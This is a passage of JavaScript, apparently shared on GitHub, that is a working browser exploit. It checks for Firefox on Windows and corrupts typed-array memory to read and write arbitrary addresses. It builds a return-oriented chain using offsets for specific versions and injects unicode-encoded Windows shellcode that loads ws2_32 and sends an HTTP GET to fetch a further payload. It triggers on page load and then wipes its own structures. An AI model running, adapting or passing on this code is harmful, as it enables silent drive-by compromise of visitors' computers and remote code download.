var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
var var29 = magneto;
var var17 = "\u9060";
var var18 = "\u9061";
var var19 = "\uC481\u0000\u0008" ;
var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var22 = "\uE589";
var var23 ="\uC3C9";
var var24 = "\uE889";
var24 += "\u608D\u90C0";
var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
var var26 = var25 + var16*4
var var27 =""
var27 += "\uB890\u2020\u2020";
var27 += "\uA390"+ae(var26+0x00);
var27 += "\uA390"+ae(var26+0x04);
var27 += "\uA390"+ae(var26+0x08);
var27 += "\uA390"+ae(var26+0x0C);
var var28 = var17;
var28 += var20;
var28 += var19;
var28 += var22;
var28 += var27;
var28 += var29;
var28 += var21;
var28 += var18;
var28 += var23;
var var29Array = new Array();
var29Array=ag(var28);
var var29Ad = var13+0x5010;
var i=0;
var j=0;
var var30=var13+0x4048;
var var31 = new Array();
var31[0]=var30;
var31[1]=var30;
var31[2]=var30;
var31[3]=var15[1];
var31[4]=var29Ad;
var31[5]=0xFFFFFFFF;
var31[6]=var13+0x4044;
var31[7]=var13+0x4040;
var31[8]=0x00000040;
var31[9]=var13+0x4048;
var31[10]=0x00040000;
var31[11]=var29Ad;
var31[12]=var13+0x301C;
for(var i=0 ; i < 0x140 ; i++)
{
var31[i+15]=var15[0];
}
var var32 = 0x3F8;
view[0x800+0+var32]=var13+0x4018;
view[0x800+1+var32]=var13+0x4018;
for(var i=2 ; i < var31.length ; i++)
{
view[0x800+i+var32]= 0x41414141;
}
for(var i=0 ; i < var31.length ; i++)
{
view[0xC02+i+var32]= var31[i];
}
for(var i=0 ; i < var29Array.length ; i++)
{
view[0x1000 + i+var32] = var29Array[i];
}
}
function g(var50,view)
{
var k = h(var50,view);
var j=0;
if( k < 0 )
return -1;
view[0x404+k]=var13+0x3010;
return 1;
}
function h(var50,view)
{
var address=0;
var u=0;
var memory="";
var var55=0;
for( u =7; u >=4 ;u--)
{
address=view[0x404+u];
if( address > 0x000A0000 && address < 0x80000000 )
{
memory = i(address,0x48,var50,view);
var55=af(memory[0x14]+memory[0x15]);
if(var55==address)
{
return u;
}
}
}
return -1;
}
function i(address,size,var50,view)
{
var var56 = size/2;
var56 = var56*0x10 +0x04;
view[0x400]=var56;
view[0x401]=address;
return var4[var50][0];
}
function j(memory,view)
{
var intArray=ag(memory);
for(var i=0 ; i < intArray.length ; i++)
{
view[0x404+i]=intArray[i];
}
}
function k()
{
for(var j=0;j<var1;j++)
{
if(var2[j].byteLength!=var5)
{
return j;
}
}
return -1;
}
function l(view,var58)
{
view[var58] = var13 + 0x1030;
view[var58+1] = 0xFFFFFF85;
}
function m(view,var58)
{
view[var58]=0x00000000;
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
if(var4[j][0]!=0x22556611)
return j;
}
}
return -1
}
function n(view,firstvar58)
{
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
var var58=0;
for(var i=0;i<200;i++)
{
if(view[var58] != 0x11336688)
{
if(view[var58] == 0x22556611 )
return var58;
else
return -1;
}
if(var58==0)
{
var58 = firstvar58;
}else{
var var59=view[var58-0x0C];
var58 = (var59 - var57)/4;
}
}
return -1;
}
function o(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
var var59 = view[0x00100000/4-0x0C];
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
return ((var59 - var57)/4);
}
function p()
{
for(var j=0;j<var1;j++)
{
for(var i=1;i<16;i++)
{
if(var3[j][i*0x4000-0x02]==0x01000000)
{
return -i;
}
}
}
return 0;
}
function q(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var7;
if(var2[var60+1].byteLength==var7)
return var60+1;
return -1;
}
function r(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var5;
}
function t()
{
if(typeof sessionStorage.tempStor !="undefined")
return false;
sessionStorage.tempStor="";
return true;
}
function u()
{
if( t() == true )
{
var9 = 1;
b();
d();
c();
}else{
return ;
}
}
function v()
{
if(k() == -1)
{
var11 = p();
var9 = 2;
c();
}else{
x();
}
}
function w()
{
if(var9==1)
v();
else
x();
}
function x()
{
var var60 = k();
if(var60==-1)
return ;
var nextvar60 = q(var60);
if(nextvar60==-1)
return ;
var var61 = o(var60);
var var62 = new Int32Array(var2[nextvar60],0,var8);
var var58 = n(var62,var61);
if(var58==-1)
return ;
var var50 = m(var62,var58);
var13 = var10 + 0x00100000 + 0x00010000 * var11;
e(var62);
l(var62,var58);
var var64 = var4[var50][0];
ac(var64,var50,var62,var58,var60);
}
function y(index)
{
var4[index][1]= document.createElement('span') ;
}
function z(index,index2)
{
var4[index][1].innerHTML;
}
function aa(view,var63)
{
return view[var63];
}
function ab(address,view,var63)
{
view[var63]=address;
}
function ac(var64,var50,var62,var58,var60)
{
var var15=ah(var64);
f(var15,var62,var58);
y(var50);
var var66 = aa(var62,var58+2);
var var67 = i(var66,0x40,var50,var62) ;
j(var67,var62);
g(var50,var62);
ab(var13+0x1040 ,var62,var58+2);
r(var60)
setTimeout(ad,1000);
z(var50);
}
function ad()
{
for(var j=0;j<var1;j++)
{
delete var3[j]
var3[j]= null;
delete var2[j];
var2[j] = null;
if(typeof var4[j] !="undefined")
{
delete var4[j];
var4[j] = null;
}
}
delete var2;
delete var3;
delete var4;
var2=null;
var3=null;
var4=null;
}
function ae(int32)
{
var var68 = String.fromCharCode((int32)& 0x0000FFFF);
var var69 = String.fromCharCode((int32 >> 16) & 0x0000FFFF);
return var68+var69;
}
function af(string)
{
var var70 = string.charCodeAt(0);
var var71 = string.charCodeAt(1);
var var72 = (var71 << 16) + var70;
return var72;
}
function ag(string)
{
if(string.length%2!=0)
string+="\u9090";
var intArray= new Array();
for(var i=0 ; i*2 < string.length; i++ )
intArray[i]=af(string[i*2]+string[i*2+1]);
return intArray;
}
function ah(var73)
{
var var74 = var73.substring(0,2);
var var70 = var74.charCodeAt(0);
var var71 = var74.charCodeAt(1);
var var75 = (var71 << 16) + var70;
if (var75 == 0)
{
var var76 = var73.substring(32, 34);
var var70 = var76.charCodeAt(0);
var var71 = var76.charCodeAt(1);
var75 = (var71 << 16) + var70;
}
var var15 = am(var75);
if (var15 == -1)
{
return;
}
return var15
}
function aj(version)
{
var i = navigator.userAgent.indexOf("Windows NT");
if (i != -1)
return true;
return false;
}
function ak()
{
var ua = navigator.userAgent;
var browser = ua.substring(0, ua.lastIndexOf("/"));
browser = browser.substring(browser.lastIndexOf(" ") + 1);
if (browser != "Firefox")
return -1;
var version = ua.substring(ua.lastIndexOf("/") + 1);
version = parseInt(version.substring(0, version.lastIndexOf(".")));
return version;
}
function al()
{
version = ak();
if (!aj(version))
return -1;
return version;
}
function am(var77)
{
var var15 = new Array(2);
if (var77 % 0x10000 == 0xE510)
{
var78 = var77 - 0xE510;
var15[0] = var78 + 0xE8AE;
var15[1] = var78 + 0xD6EE;
}
else if (var77 % 0x10000 == 0x9A90)
{
var78 = var77 - 0x69A90;
var15[0] = var78 + 0x6A063;
var15[1] = var78 + 0x68968;
}
else if (var77 % 0x10000 == 0x5E70)
{
var78 = var77 - 0x65E70;
var15[0] = var78 + 0x66413;
var15[1] = var78 + 0x64D34;
}
else if (var77 % 0x10000 == 0x35F3)
{
var78 = var77 - 0x335F3;
var15[0] = var78 + 0x4DE13;
var15[1] = var78 + 0x49AB8;
}
else if (var77 % 0x10000 == 0x5CA0)
{
var78 = var77 - 0x65CA0;
var15[0] = var78 + 0x66253;
var15[1] = var78 + 0x64B84;
}
else if (var77 % 0x10000 == 0x5CD0)
{
var78 = var77 - 0x65CD0;
var15[0] = var78 + 0x662A3;
var15[1] = var78 + 0x64BA4;
}
else if (var77 % 0x10000 == 0x6190)
{
var78 = var77 - 0x46190;
var15[0] = var78 + 0x467D3;
var15[1] = var78 + 0x45000;
}
else if (var77 % 0x10000 == 0x9CB9)
{
var78 = var77 - 0x29CB9;
var15[0] = var78 + 0x29B83;
var15[1] = var78 + 0xFFC8;
}
else if (var77 % 0x10000 == 0x9CE9)
{
var78 = var77 - 0x29CE9;
var15[0] = var78 + 0x29BB3;
var15[1] = var78 + 0xFFD8;
}
else if (var77 % 0x10000 == 0x70B0)
{
var78 = var77 - 0x470B0;
var15[0] = var78 + 0x47733;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x7090)
{
var78 = var77 - 0x47090;
var15[0] = var78 + 0x476B3;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x9E49)
{
var78 = var77 - 0x29E49;
var15[0] = var78 + 0x29D13;
var15[1] = var78 + 0x10028;
}
else if (var77 % 0x10000 == 0x9E69)
{
var78 = var77 - 0x29E69;
var15[0] = var78 + 0x29D33;
var15[1] = var78 + 0x10018;
}
else if (var77 % 0x10000 == 0x9EB9)
{
var78 = var77 - 0x29EB9;
var15[0] = var78 + 0x29D83;
var15[1] = var78 + 0xFFC8;
}
else
{
return -1;
}
return var15;
}
window.addEventListener("onload", u(),true);
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment